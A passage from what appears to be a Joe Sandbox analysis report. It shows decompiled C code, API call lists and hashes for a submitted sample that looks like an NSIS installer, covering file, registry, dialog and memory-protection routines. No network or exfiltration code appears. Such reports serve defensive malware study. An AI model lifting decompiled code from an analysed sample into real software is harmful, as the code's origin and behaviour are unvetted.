                                                            					 *_t17 = _t12;
                                                            				}
                                                            				_t17[0x1fff] = _t12;
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t19 - 4));
                                                            				return 0;
                                                            			}









                                                            APIs
                                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00002000,00000001), ref: 00401A31
                                                            • lstrcmpA.KERNEL32(?,?,?,00002000,00000001), ref: 00401A44
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStringslstrcmp
                                                            • String ID:
                                                            • API String ID: 1938659011-0
                                                            • Opcode ID: 4ff85bcb3c9e7bd11aa9790aa2296d6940b0516171ff6c32d0b182c22be1f72c
                                                            • Instruction ID: 0c80c25ae6124d08632ca9112a85281756203997caa87babcc69875add3a12a2
                                                            • Opcode Fuzzy Hash: 4ff85bcb3c9e7bd11aa9790aa2296d6940b0516171ff6c32d0b182c22be1f72c
                                                            • Instruction Fuzzy Hash: E1F08231705201EBDB20DF769D48A9FBFA5EF92350710843FE145F6191D7788501CA68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableShow
                                                            • String ID:
                                                            • API String ID: 1136574915-0
                                                            • Opcode ID: f9bc8f064641d470ec4c16ff3f6f2a01e2106a779a3e6cb67e237468840b0f57
                                                            • Instruction ID: 95492d4cb058fd8d3dfd6bdd8f68eb7ce1d8cbcbb3bb97f8bbdf30dd964bc089
                                                            • Opcode Fuzzy Hash: f9bc8f064641d470ec4c16ff3f6f2a01e2106a779a3e6cb67e237468840b0f57
                                                            • Instruction Fuzzy Hash: 12E01272A08200AFD714EBA5AA8956EB7B4EB81365B20443FF101F11D1DBB858408A69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406663(signed int _a4) {
                                                            				struct HINSTANCE__* _t5;
                                                            				signed int _t10;
                                                            
                                                            				_t10 = _a4 << 3;
                                                            				_t8 =  *(_t10 + 0x40a240);
                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                                            				if(_t5 != 0) {
                                                            					L2:
                                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                                            				}
                                                            				_t5 = E004065F5(_t8); // executed
                                                            				if(_t5 == 0) {
                                                            					return 0;
                                                            				}
                                                            				goto L2;
                                                            			}






                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                              • Part of subcall function 004065F5: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                              • Part of subcall function 004065F5: wsprintfA.USER32 ref: 00406645
                                                              • Part of subcall function 004065F5: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                            • Instruction ID: 42df78af1693d05b1f4151e300c7058424afa75421c13d02aa0b0909378b53c4
                                                            • Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                            • Instruction Fuzzy Hash: 7FE086326042106BD3105B755E0493B73AC9E997103020D3EF94AF2140D7399C32966D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00405DEA(CHAR* _a4, long _a8, long _a12) {
                                                            				signed int _t5;
                                                            				void* _t6;
                                                            
                                                            				_t5 = GetFileAttributesA(_a4); // executed
                                                            				asm("sbb ecx, ecx");
                                                            				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                            				return _t6;
                                                            			}






                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                            • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                            • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                            • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004058BB(CHAR* _a4) {
                                                            				int _t2;
                                                            
                                                            				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                            				if(_t2 == 0) {
                                                            					return GetLastError();
                                                            				}
                                                            				return 0;
                                                            			}





                                                            APIs
                                                            • CreateDirectoryA.KERNELBASE(?,00000000,004033A6,00485000,00485000,00485000,00485000,00485000,00403690,?,00000007,00000009,0000000B), ref: 004058C1
                                                            • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CF
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                            • Instruction ID: 3fc85bafe69b7557593d5765bf5919c43deceba34b0c9ea4212deea00e127d8c
                                                            • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                            • Instruction Fuzzy Hash: 34C04C31214601EED6106B219E08B177BE5AB50741F25843E6646F00A0DE388469DA2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004023A4(int __eax, CHAR* __ebx) {
                                                            				CHAR* _t11;
                                                            				void* _t13;
                                                            				CHAR* _t14;
                                                            				void* _t18;
                                                            				int _t22;
                                                            
                                                            				_t11 = __ebx;
                                                            				_t5 = __eax;
                                                            				_t14 = 0;
                                                            				if(__eax != __ebx) {
                                                            					__eax = E00402C39(__ebx);
                                                            				}
                                                            				if(_t13 != _t11) {
                                                            					_t14 = E00402C39(0x11);
                                                            				}
                                                            				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
                                                            					_t11 = E00402C39(0x22);
                                                            				}
                                                            				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402C39(0xffffffcd)); // executed
                                                            				_t22 = _t5;
                                                            				if(_t22 == 0) {
                                                            					 *((intOrPtr*)(_t18 - 4)) = 1;
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t18 - 4));
                                                            				return 0;
                                                            			}









                                                            APIs
                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023DD
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: f7546b57c2d88294b794a0ce81ec9b16f8aeca243a3d815bd59fa4cac4068163
                                                            • Instruction ID: f0bce9e42b5e283f9075ac1063ffb1f66a35e0649843f6992b50a90661d40e1e
                                                            • Opcode Fuzzy Hash: f7546b57c2d88294b794a0ce81ec9b16f8aeca243a3d815bd59fa4cac4068163
                                                            • Instruction Fuzzy Hash: 8BE04831604128ABE7203EF21F8D97F10989B84304B64053FBA01B61C2D9FD4C4242A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040610B(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                                            				void* _t7;
                                                            				long _t8;
                                                            				void* _t9;
                                                            
                                                            				_t7 = E0040605C(_a4,  &_a12);
                                                            				if(_t7 != 0) {
                                                            					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                            					return _t8;
                                                            				}
                                                            				_t9 = 6;
                                                            				return _t9;
                                                            			}







                                                            APIs
                                                            • RegCreateKeyExA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406134
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                            • Instruction ID: f3dc4abaab06895e066b0b710936ca54da7b1f8b7a25aa4512e4b4def2a222e8
                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                            • Instruction Fuzzy Hash: BAE0E672110209BEEF195F50DC0AD7B371DEB14314F01452EF947D4091E6B5A9305634
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405E62(void* _a4, void* _a8, long _a12) {
                                                            				int _t7;
                                                            				long _t11;
                                                            
                                                            				_t11 = _a12;
                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                            					return 0;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}






                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405E76
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                            • Instruction ID: d159feaa40f66387c232a0365126d803d89e879c5a9a8176c13ce5bb2f202f1c
                                                            • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                            • Instruction Fuzzy Hash: CFE0B63221025AAFDF109F95DC00AAB7B6CEB05260F144437FD99E6150D671E961DAE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405E91(void* _a4, void* _a8, long _a12) {
                                                            				int _t7;
                                                            				long _t11;
                                                            
                                                            				_t11 = _a12;
                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                            					return 0;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}






                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405EA5
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                            • Instruction ID: f6dbd1b2bb29cf3778f9da1b12eb4ab865b2d476cff05d6c6da3e568d4bed244
                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                            • Instruction Fuzzy Hash: CEE0EC3221165AABEF119F65DC00AEB7B6CEB05361F004836FA95E3150D631E9219BE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                            
                                                            				 *0x73c35014 = _a4;
                                                            				if(_a8 == 1) {
                                                            					VirtualProtect(0x73c3501c, 4, 0x40, 0x73c35034); // executed
                                                            					 *0x73c3501c = 0xc2;
                                                            					 *0x73c35034 = 0;
                                                            					 *0x73c35030 = 0;
                                                            					 *0x73c3502c = 0;
                                                            					 *0x73c35028 = 0;
                                                            					 *0x73c35024 = 0;
                                                            					 *0x73c35020 = 0;
                                                            					 *0x73c3501e = 0;
                                                            				}
                                                            				return 1;
                                                            			}




                                                            APIs
                                                            • VirtualProtect.KERNELBASE(73C3501C,00000004,00000040,73C35034), ref: 73C319E5
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: cf80e85d301138b1742db06ccd89520eaf9e6cc34ae476591a41a4fb4d9fecb8
                                                            • Instruction ID: 59a7b0ca4237653c92c73305a6537c36e4901d12660a3aa831db0e1fe2509fa4
                                                            • Opcode Fuzzy Hash: cf80e85d301138b1742db06ccd89520eaf9e6cc34ae476591a41a4fb4d9fecb8
                                                            • Instruction Fuzzy Hash: B5F0ACF6A19380DAC318EF1A95457853EE0B719355F60452EF79EDA341C33289009FDB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004060DD(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                                            				void* _t7;
                                                            				long _t8;
                                                            				void* _t9;
                                                            
                                                            				_t7 = E0040605C(_a4,  &_a12);
                                                            				if(_t7 != 0) {
                                                            					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
                                                            					return _t8;
                                                            				}
                                                            				_t9 = 6;
                                                            				return _t9;
                                                            			}







                                                            APIs
                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,?,?), ref: 00406101
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                            • Instruction ID: acfb9daac442d6471bee54970dc50a73ebaac4160da87f0822be439bec8b4f66
                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                            • Instruction Fuzzy Hash: 01D0123204020DFBEF119F90DD05FAB3B1DAB08310F014426FE06A4091D776D530A724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040159D() {
                                                            				int _t5;
                                                            				void* _t11;
                                                            				int _t14;
                                                            
                                                            				_t5 = SetFileAttributesA(E00402C39(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                            				_t14 = _t5;
                                                            				if(_t14 == 0) {
                                                            					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t11 - 4));
                                                            				return 0;
                                                            			}







                                                            APIs
                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 4c6f9109c7df2b6538a7cf6a4021bb015a1706267f02f3e3fda4f3a54644e72c
                                                            • Instruction ID: e4c96a1e4e3d7fafacf821d9605d951cf466c31607fdae1070ddd011c57cfc7f
                                                            • Opcode Fuzzy Hash: 4c6f9109c7df2b6538a7cf6a4021bb015a1706267f02f3e3fda4f3a54644e72c
                                                            • Instruction Fuzzy Hash: 4DD01232B14104DBDB10DFA5AB0899E73A4DB55325B308577E101F21D1D6B9D9409B3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004042D4(intOrPtr _a12) {
                                                            				intOrPtr _v0;
                                                            				struct HWND__* _v4;
                                                            				int _t7;
                                                            				void* _t8;
                                                            				void* _t9;
                                                            				void* _t10;
                                                            
                                                            				_t7 = SetDlgItemTextA(_v4, _v0 + 0x3e8, E004062EA(_t8, _t9, _t10, 0, _a12)); // executed
                                                            				return _t7;
                                                            			}









                                                            0x004042ee
                                                            0x004042f3

                                                            APIs
                                                            • SetDlgItemTextA.USER32(?,?,00000000), ref: 004042EE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ItemText
                                                            • String ID:
                                                            • API String ID: 3367045223-0
                                                            • Opcode ID: a7ccc5f13d7a9dd03b49f03cec007a1df0ae89502798fe29fb091b2ebe8b6ea7
                                                            • Instruction ID: 22e3c99022c4b401909cfeccc5f53fcf3645d9aba18eb3be6cde127aefdf9dc7
                                                            • Opcode Fuzzy Hash: a7ccc5f13d7a9dd03b49f03cec007a1df0ae89502798fe29fb091b2ebe8b6ea7
                                                            • Instruction Fuzzy Hash: 26C04C75548200BFD641B755CC42F1FB799EFA432AF00C52EB15DA11D1C635C8209A2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404320(int _a4) {
                                                            				struct HWND__* _t2;
                                                            				long _t3;
                                                            
                                                            				_t2 =  *0x44e3f8;
                                                            				if(_t2 != 0) {
                                                            					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
                                                            					return _t3;
                                                            				}
                                                            				return _t2;
                                                            			}






                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: f50e63b132b24878aef5dc53f281ae586e67706c8815a59119a5f52f37cdf5c1
                                                            • Instruction ID: f33369c0959fc2f31fb2d94020f8cc99ded583a01a7fd26deb419bde1f84e5de
                                                            • Opcode Fuzzy Hash: f50e63b132b24878aef5dc53f281ae586e67706c8815a59119a5f52f37cdf5c1
                                                            • Instruction Fuzzy Hash: 52C09B757447017FEA159F619D45F077798B760B01F1544397750F70D0C674D410D61C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040336B(long _a4) {
                                                            				long _t2;
                                                            
                                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                            				return _t2;
                                                            			}





                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00403379
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404309(int _a4) {
                                                            				long _t2;
                                                            
                                                            				_t2 = SendMessageA( *0x452428, 0x28, _a4, 1); // executed
                                                            				return _t2;
                                                            			}





                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004042F6(int _a4) {
                                                            				int _t2;
                                                            
                                                            				_t2 = EnableWindow( *0x43c08c, _a4); // executed
                                                            				return _t2;
                                                            			}





                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,004040D2), ref: 00404300
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004014D6(intOrPtr __edx) {
                                                            				long _t3;
                                                            				void* _t7;
                                                            				intOrPtr _t10;
                                                            				void* _t13;
                                                            
                                                            				_t10 = __edx;
                                                            				_t3 = E00402C17(_t7);
                                                            				 *((intOrPtr*)(_t13 - 0x38)) = _t10;
                                                            				if(_t3 <= 1) {
                                                            					_t3 = 1;
                                                            				}
                                                            				Sleep(_t3); // executed
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t13 - 4));
                                                            				return 0;
                                                            			}








                                                            APIs
                                                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E73C312C6() {
                                                            				void* _t1;
                                                            
                                                            				_t1 = GlobalAlloc(0x40,  *0x73c35040); // executed
                                                            				return _t1;
                                                            			}





                                                            APIs
                                                            • GlobalAlloc.KERNELBASE(00000040,73C311C4,-000000A0), ref: 73C312CE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID:
                                                            • API String ID: 3761449716-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E00404CD9(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                            				struct HWND__* _v8;
                                                            				struct HWND__* _v12;
                                                            				long _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				intOrPtr _v28;
                                                            				signed char* _v32;
                                                            				int _v36;
                                                            				signed int _v44;
                                                            				int _v48;
                                                            				signed int* _v60;
                                                            				signed char* _v64;
                                                            				signed int _v68;
                                                            				long _v72;
                                                            				void* _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				void* _v88;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t203;
                                                            				intOrPtr _t206;
                                                            				long _t212;
                                                            				signed int _t216;
                                                            				signed int _t227;
                                                            				void* _t230;
                                                            				void* _t231;
                                                            				int _t237;
                                                            				long _t242;
                                                            				long _t243;
                                                            				signed int _t244;
                                                            				signed int _t250;
                                                            				signed int _t252;
                                                            				signed char _t253;
                                                            				signed char _t259;
                                                            				void* _t264;
                                                            				void* _t266;
                                                            				signed char* _t284;
                                                            				signed char _t285;
                                                            				long _t290;
                                                            				signed int _t300;
                                                            				signed int _t308;
                                                            				signed char* _t316;
                                                            				int _t320;
                                                            				int _t321;
                                                            				signed int* _t322;
                                                            				int _t323;
                                                            				long _t324;
                                                            				signed int _t325;
                                                            				long _t327;
                                                            				int _t328;
                                                            				signed int _t329;
                                                            				void* _t331;
                                                            
                                                            				_v12 = GetDlgItem(_a4, 0x3f9);
                                                            				_v8 = GetDlgItem(_a4, 0x408);
                                                            				_t331 = SendMessageA;
                                                            				_v24 =  *0x452448;
                                                            				_v28 =  *0x452430 + 0x94;
                                                            				_t320 = 0x10;
                                                            				if(_a8 != 0x110) {
                                                            					L23:
                                                            					if(_a8 != 0x405) {
                                                            						_t298 = _a16;
                                                            					} else {
                                                            						_a12 = 0;
                                                            						_t298 = 1;
                                                            						_a8 = 0x40f;
                                                            						_a16 = 1;
                                                            					}
                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                            						_v16 = _t298;
                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                            							if(( *0x452439 & 0x00000002) != 0) {
                                                            								L41:
                                                            								if(_v16 != 0) {
                                                            									_t242 = _v16;
                                                            									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                            										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                            									}
                                                            									_t243 = _v16;
                                                            									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                            										_t298 = _v24;
                                                            										_t244 =  *(_t243 + 0x5c);
                                                            										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                            											 *(_t244 * 0x2018 + _t298 + 8) =  *(_t244 * 0x2018 + _t298 + 8) & 0xffffffdf;
                                                            										} else {
                                                            											 *(_t244 * 0x2018 + _t298 + 8) =  *(_t244 * 0x2018 + _t298 + 8) | 0x00000020;
                                                            										}
                                                            									}
                                                            								}
                                                            								goto L48;
                                                            							}
                                                            							if(_a8 == 0x413) {
                                                            								L33:
                                                            								_t298 = 0 | _a8 != 0x00000413;
                                                            								_t250 = E00404C27(_v8, _a8 != 0x413);
                                                            								_t325 = _t250;
                                                            								if(_t325 >= 0) {
                                                            									_t99 = _v24 + 8; // 0x8
                                                            									_t298 = _t250 * 0x2018 + _t99;
                                                            									_t252 =  *_t298;
                                                            									if((_t252 & 0x00000010) == 0) {
                                                            										if((_t252 & 0x00000040) == 0) {
                                                            											_t253 = _t252 ^ 0x00000001;
                                                            										} else {
                                                            											_t259 = _t252 ^ 0x00000080;
                                                            											if(_t259 >= 0) {
                                                            												_t253 = _t259 & 0x000000fe;
                                                            											} else {
                                                            												_t253 = _t259 | 0x00000001;
                                                            											}
                                                            										}
                                                            										 *_t298 = _t253;
                                                            										E0040117D(_t325);
                                                            										_a12 = _t325 + 1;
                                                            										_a16 =  !( *0x452438) >> 0x00000008 & 0x00000001;
                                                            										_a8 = 0x40f;
                                                            									}
                                                            								}
                                                            								goto L41;
                                                            							}
                                                            							_t298 = _a16;
                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                            								goto L41;
                                                            							}
                                                            							goto L33;
                                                            						} else {
                                                            							goto L48;
                                                            						}
                                                            					} else {
                                                            						L48:
                                                            						if(_a8 != 0x111) {
                                                            							L56:
                                                            							if(_a8 == 0x200) {
